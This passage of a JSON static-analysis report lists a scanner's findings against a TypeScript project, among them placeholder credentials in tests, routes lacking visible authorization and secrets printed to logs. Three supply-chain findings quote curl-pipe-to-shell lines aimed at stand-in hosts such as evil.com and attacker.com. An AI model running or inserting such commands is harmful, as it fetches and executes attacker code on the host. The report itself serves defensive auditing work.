"quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/handoff-lifecycle.test.ts"}, "region": {"startLine": 36}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22089, "scanner": "repobility", "fingerprint": "465554096f842ae363dbcb00d103f5dd", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/handoff-lifecycle.test.ts"}, "region": {"startLine": 34}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22088, "scanner": "repobility", "fingerprint": "f4ebea909e4da1db5b11fffde7bcf957", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-edge-cases.test.ts"}, "region": {"startLine": 40}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22087, "scanner": "repobility", "fingerprint": "0fc11385ea2b94255fbbc6839f2e76f9", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/worktree-monitor.test.ts"}, "region": {"startLine": 63}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22086, "scanner": "repobility", "fingerprint": "ad2927399db7bb5964660991a562c57d", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-state-manager.test.ts"}, "region": {"startLine": 52}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22085, "scanner": "repobility", "fingerprint": "926b36c8517507d45bc162eb5c7009be", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/RelationshipManager.test.ts"}, "region": {"startLine": 654}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22084, "scanner": "repobility", "fingerprint": "81c579f48ba2d8b28cfb95890b8a3d8f", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/branch-manager.test.ts"}, "region": {"startLine": 62}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22083, "scanner": "repobility", "fingerprint": "8ec9d23d6cb39c783c815b57c103cee4", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/handoff-manager.test.ts"}, "region": {"startLine": 107}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22082, "scanner": "repobility", "fingerprint": "d525a699fc58adc1b6b1d5196df14aaf", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/user-manager-edge.test.ts"}, "region": {"startLine": 195}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22081, "scanner": "repobility", "fingerprint": "cb92c44524d36dd988b2cf80160278ba", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/user-manager-edge.test.ts"}, "region": {"startLine": 184}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22080, "scanner": "repobility", "fingerprint": "58995d88970bad57fd6da0c1204b5fc3", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/branch-wiring.test.ts"}, "region": {"startLine": 81}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22079, "scanner": "repobility", "fingerprint": "35a2a19dccd6870c4d82ed9ab492aa58", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/handoff-wiring.test.ts"}, "region": {"startLine": 46}}}]}, {"ruleId": "WEB005", "level": "note", "message": {"text": "robots.txt does not advertise a sitemap"}, "properties": {"repobilityId": 10615, "scanner": "repobility-web-presence", "fingerprint": "55ac3b628a8dff92dc50ddc10564f7d852de5445c6778ff7e89cdbf3a4fed6bd", "category": "quality", "severity": "low", "confidence": 0.74, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Discovered robots file or route lacks a Sitemap directive.", "evidence": {"rule_id": "WEB005", "scanner": "repobility-web-presence", "references": ["https://www.rfc-editor.org/rfc/rfc9309", "https://www.sitemaps.org/protocol.html"], "correlation_key": "fp|55ac3b628a8dff92dc50ddc10564f7d852de5445c6778ff7e89cdbf3a4fed6bd"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "CLAUDE.md"}, "region": {"startLine": 1}}}]}, {"ruleId": "DKR008", "level": "note", "message": {"text": ".dockerignore misses sensitive defaults"}, "properties": {"repobilityId": 10578, "scanner": "repobility-docker", "fingerprint": "aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "category": "docker", "severity": "low", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "A Docker build context should exclude secrets and repository metadata.", "evidence": {"rule_id": "DKR008", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "missing_patterns": [".env", "id_rsa", "*.pem", "*.key"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".dockerignore"}, "region": {"startLine": 1}}}]}, {"ruleId": "SEC006", "level": "note", "message": {"text": "[SEC006] XSS Risk: Direct HTML injection without sanitization."}, "properties": {"repobilityId": 10576, "scanner": "repobility-threat-engine", "fingerprint": "544e2f1a3b92add814b9f2ae577e069759cf5ba8f35a439acd1b50eac4832525", "category": "injection", "severity": "low", "confidence": 0.4, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "No user-input source (request/query/fetch/URL) found \u2014 may be static content", "evidence": {"match": "document.write(h", "reason": "No user-input source (request/query/fetch/URL) found \u2014 may be static content", "rule_id": "SEC006", "scanner": "repobility-threat-engine", "confidence": 0.4, "correlation_key": "code|injection|token|263|sec006"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/publishing/PrivateViewer.ts"}, "region": {"startLine": 263}}}]}, {"ruleId": "ERR003", "level": "note", "message": {"text": "[ERR003] Ignored Error (Go): Ignoring error return values."}, "properties": {"repobilityId": 10568, "scanner": "repobility-threat-engine", "fingerprint": "d30eb854cc776f7de36e981e5f0d4cc9a7b4ec7661ffc5639f5cf15ac5100098", "category": "error_handling", "severity": "low", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "_ = filepath.Walk(", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR003", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|d30eb854cc776f7de36e981e5f0d4cc9a7b4ec7661ffc5639f5cf15ac5100098"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/attachments-sync/main.go"}, "region": {"startLine": 206}}}]}, {"ruleId": "ERR002", "level": "none", "message": {"text": "[ERR002] Empty Catch Block (and 7 more): Same pattern found in 7 additional files. Review if needed."}, "properties": {"repobilityId": 10575, "scanner": "repobility-threat-engine", "fingerprint": "5c81d47da75c572182ad0e4e4629636dbf842fd65f2c830612248897d6fb397f", "category": "error_handling", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 7 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 7 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|5c81d47da75c572182ad0e4e4629636dbf842fd65f2c830612248897d6fb397f"}}}, {"ruleId": "ERR001", "level": "none", "message": {"text": "[ERR001] Silent Exception Swallowing (and 6 more): Same pattern found in 6 additional files. Review if needed."}, "properties": {"repobilityId": 10567, "scanner": "repobility-threat-engine", "fingerprint": "09a342afadf11f998ff72aae4f6dc6fdfc3a7a53fdd52d6a06632d6970e31c19", "category": "error_handling", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 6 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 6 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|09a342afadf11f998ff72aae4f6dc6fdfc3a7a53fdd52d6a06632d6970e31c19"}}}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security (and 29 more): Same pattern found in 29 additional files. Review if needed."}, "properties": {"repobilityId": 10563, "scanner": "repobility-threat-engine", "fingerprint": "7495c2fb16713fb1d62abdca83107c4ccb1f228bd591294d25c2badfea8bbdb4", "category": "crypto", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 29 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 29 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|7495c2fb16713fb1d62abdca83107c4ccb1f228bd591294d25c2badfea8bbdb4"}}}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 10562, "scanner": "repobility-threat-engine", "fingerprint": "bfe05c9caa67b9f18daec0702c1c189042cff850608e2c9562a428f38f1b4aba", "category": "crypto", "severity": "info", "confidence": 0.25, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "evidence": {"match": "Math.random()", "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.25, "correlation_key": "code|crypto|token|678|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/EvolutionManager.ts"}, "region": {"startLine": 678}}}]}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 10561, "scanner": "repobility-threat-engine", "fingerprint": "0d16dc09cb612974cad9070a2a2a53ccf0c1c233942ad2913a38ba0faa1b7ab8", "category": "crypto", "severity": "info", "confidence": 0.25, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "evidence": {"match": "Math.random()", "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.25, "correlation_key": "code|crypto|src/core/dispatchmanager.ts|626|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/DispatchManager.ts"}, "region": {"startLine": 626}}}]}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 10560, "scanner": "repobility-threat-engine", "fingerprint": "43a294bcc907fb99e7e8b9c16cbe345c45e88c23cbe459519e4fed5882f6a04d", "category": "crypto", "severity": "info", "confidence": 0.25, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "evidence": {"match": "Math.random()", "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.25, "correlation_key": "code|crypto|src/cli.ts|89|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 89}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs (and 30 more): Same pattern found in 30 additional files. Review if needed."}, "properties": {"repobilityId": 10559, "scanner": "repobility-threat-engine", "fingerprint": "1486964fddabc4dbe0eca3ff5dab800d43de27623c4b1f0a4623d09e0bc356ac", "category": "credential_exposure", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 30 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 30 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|1486964fddabc4dbe0eca3ff5dab800d43de27623c4b1f0a4623d09e0bc356ac"}}}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 10558, "scanner": "repobility-threat-engine", "fingerprint": "0a42d00955cde6406370689e4c21d1647c919e951e361d544f6c067afbc7dd70", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log line appears to mention secret metadata or a redacted value rather than printing the secret", "evidence": {"match": "console.error('worktree-precommit: WARN \u2014 missing INSTAR_SERVER_URL/INSTAR_AUTH_TOKEN; cannot enforc", "reason": "Log line appears to mention secret metadata or a redacted value rather than printing the secret", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|token|10|console.error worktree-precommit: warn missing token cannot enforc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/worktree-precommit-gate.js"}, "region": {"startLine": 105}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 10557, "scanner": "repobility-threat-engine", "fingerprint": "d167917618d349a03e5f20eaad4d2c2a99d1bc9bcdf47f10737af1cc31cc225e", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "evidence": {"match": "console.log('    SLACK_CONTRACT_BOT_TOKEN=<redacted> npm run test:contract\\n')", "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|token|9|console.log slack_contract_bot_token redacted npm run test:contract n"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/check-contract-evidence.js"}, "region": {"startLine": 92}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15556, "scanner": "repobility", "fingerprint": "7e3cc8408599e52bdfd6b973ec478dee", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "curl http://evil.com/payload | sh", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/phase4-dispatch-scope-provenance.test.ts"}, "region": {"startLine": 176}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15555, "scanner": "repobility", "fingerprint": "aaa0150fc2cb15d5b8c9808ce5ecbb09", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "curl evil.com | bash", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/file-viewer-e2e.test.ts"}, "region": {"startLine": 497}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15554, "scanner": "repobility", "fingerprint": "0843f8eee2289364901b375e0128d795", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "curl attacker.com/exfil | bash", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 483}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /jobs/:slug/trigger."}, "properties": {"repobilityId": 10590, "scanner": "repobility-access-control", "fingerprint": "a8dc8ef58fa45122175ddca7653175d47aba6b7ccdcbac12d6c6c5471124e524", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/jobs/:slug/trigger", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|4541|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 4541}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: GET /context/:segmentId."}, "properties": {"repobilityId": 10589, "scanner": "repobility-access-control", "fingerprint": "00b751d6746b28e21b0a9409c1cb599bc27c6a2509bf65b71231a5056f5cb755", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/context/:segmentId", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|3684|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 3684}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: GET /memory/evidence/by-entity/:id."}, "properties": {"repobilityId": 10588, "scanner": "repobility-access-control", "fingerprint": "473f04521f301aef447e910f29e4f7904c26b1da098620c0d417a3e74a886766", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/memory/evidence/by-entity/:id", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2610|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2610}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /semantic/verify/:id."}, "properties": {"repobilityId": 10587, "scanner": "repobility-access-control", "fingerprint": "be7c6c9986351cea6bb7b052f4793df9c5b2906ae880d0c6aacd49117bada53e", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/verify/:id", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2486|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2486}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: GET /semantic/explore/:id."}, "properties": {"repobilityId": 10586, "scanner": "repobility-access-control", "fingerprint": "4379d4b089c3e8a9aa7274f437fe43f4793b78ae224bc367bf8ec1d948f16bee", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/explore/:id", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2474|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2474}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: DELETE /semantic/forget/:id."}, "properties": {"repobilityId": 10585, "scanner": "repobility-access-control", "fingerprint": "9b4ff2b1a0c8ee171a1c32e39cffe6fe1c6f28dbd6c2a8f1b10ea8647c0b5427", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/forget/:id", "method": "DELETE", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2403|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2403}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: GET /semantic/recall/:id."}, "properties": {"repobilityId": 10584, "scanner": "repobility-access-control", "fingerprint": "bb8184a9b8c8af2a54d9b172ff9dd737328c4956e5057de7d9ef629ced4fd3f4", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/recall/:id", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2392|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2392}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /backups/:id/restore."}, "properties": {"repobilityId": 10583, "scanner": "repobility-access-control", "fingerprint": "a56616bc8c6b0e394e911a52a2599856e08f37d82fdd370d66d5c1a61fd0f028", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups/:id/restore", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2157|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2157}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: GET /internal/stop-gate/annotations/:eventId."}, "properties": {"repobilityId": 10582, "scanner": "repobility-access-control", "fingerprint": "66492de225ff5ddf8e83f55064739742dd898053b303fff51413649841dffc9a", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/internal/stop-gate/annotations/:eventId", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|1817|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 1817}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: GET /moltbridge/trust/:agentId."}, "properties": {"repobilityId": 10581, "scanner": "repobility-access-control", "fingerprint": "2389f6d4c6bf094ac42d9c95cf470198c083c9b74a5738622d7d647c3dc03b31", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/moltbridge/trust/:agentId", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/moltbridge/routes.ts|73|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/moltbridge/routes.ts"}, "region": {"startLine": 73}}}]}, {"ruleId": "SEC020", "level": "error", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 10556, "scanner": "repobility-threat-engine", "fingerprint": "399d51c0123ffc5301cf22efbbe6d073391bea754acca69be827646f0dd810f7", "category": "credential_exposure", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Credential-bearing variable appears to be printed or logged", "evidence": {"match": "print(d.get('token','')", "reason": "Credential-bearing variable appears to be printed or logged", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.85, "correlation_key": "secret|token|263|print d.get token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/PostUpdateMigrator.ts"}, "region": {"startLine": 2638}}}]}, {"ruleId": "SECR004", "level": "error", "message": {"text": 